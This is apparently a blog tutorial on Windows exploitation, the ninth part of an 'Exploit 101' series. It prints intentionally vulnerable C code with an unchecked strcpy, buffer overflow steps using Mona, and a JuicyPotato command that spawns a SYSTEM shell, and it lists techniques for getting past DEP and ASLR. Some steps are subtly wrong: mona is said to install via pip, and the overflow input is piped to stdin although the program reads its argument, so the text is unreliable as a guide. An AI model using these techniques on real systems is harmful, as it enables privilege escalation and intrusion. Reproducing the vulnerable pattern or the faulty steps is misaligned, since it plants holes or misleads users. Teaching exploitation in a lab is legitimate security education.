Monday, March 3, 2025

Exploit 101: Part 9 - Windows Exploitation Basics


In this ninth part of our Exploit 101 series, we shift focus to Windows Exploitation, covering how attackers find and exploit vulnerabilities in Windows systems for privilege escalation and remote code execution.

Understanding Windows Exploitation

Windows exploits target vulnerabilities in user-mode applications, kernel components, and network services. These exploits often aim to:

  • Escalate privileges from low-level users to SYSTEM.
  • Execute arbitrary code through memory corruption.
  • Bypass security mechanisms like DEP, ASLR, and PatchGuard.
  • Persist on a system by modifying registry, services, or scheduled tasks.

Common Windows Vulnerabilities

  1. Buffer Overflow – Overwriting memory structures to hijack execution.
  2. Privilege Escalation – Exploiting kernel flaws to elevate privileges.
  3. DLL Hijacking – Replacing legitimate DLLs with malicious versions.
  4. Token Impersonation – Abusing high-privileged access tokens.
  5. EternalBlue (SMB Exploit - CVE-2017-0144) – Remote code execution via SMB.

Setting Up a Windows Exploitation Lab

Required Tools

  • Windows 10/7 Virtual Machine (Target system)
  • Kali Linux or CommandoVM (Attacker system)
  • Metasploit Framework (Exploit development)
    sudo apt install metasploit-framework
    
  • WinDbg (Windows Debugger for analyzing crashes)
  • Immunity Debugger with Mona.py (Buffer overflow fuzzing)
    pip install mona
    

Exploit 1: Buffer Overflow in Windows

Vulnerable C Code

#include <stdio.h>
#include <string.h>

void vulnerable_function(char *input) {
    char buffer[128];
    strcpy(buffer, input); // No bounds checking
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    return 0;
}

Exploiting It

Compile with:

gcc -o vuln.exe vuln.c

Find crash offset using Mona.py in Immunity Debugger:

!mona pattern_create 300

Trigger overflow:

python -c 'print("A"*300)' | vuln.exe

Check EIP overwrite with:

!mona pattern_offset 0x41414141  # Replace with actual EIP value

Exploit 2: Privilege Escalation via Token Impersonation

Abusing SeImpersonatePrivilege

If a process has SeImpersonatePrivilege, it can escalate privileges:

  1. Check privileges:
    whoami /priv
    
  2. Use JuicyPotato exploit:
    JuicyPotato.exe -t * -p cmd.exe -l 1337
    
  3. Spawn SYSTEM shell:
    whoami  # Now running as SYSTEM
    

Windows Exploitation Mitigations

Windows includes multiple security features:

  • DEP (Data Execution Prevention) – Prevents execution of non-executable memory.
  • ASLR (Address Space Layout Randomization) – Randomizes memory addresses.
  • PatchGuard – Protects kernel structures from modification.
  • Credential Guard – Prevents credential dumping attacks.

Bypassing Protections

  • Return-Oriented Programming (ROP) – Bypasses DEP by chaining existing code.
  • Heap Spray – Predicts ASLR-protected addresses by flooding memory.
  • DLL Injection – Loads malicious code into trusted processes.

Conclusion

Windows exploitation requires understanding memory corruption, privilege escalation, and bypassing security defenses. In the next part, we will cover Advanced Windows Exploitation Techniques.

Stay tuned for Exploit 101: Part 10 – Advanced Windows Exploitation!

0 comments: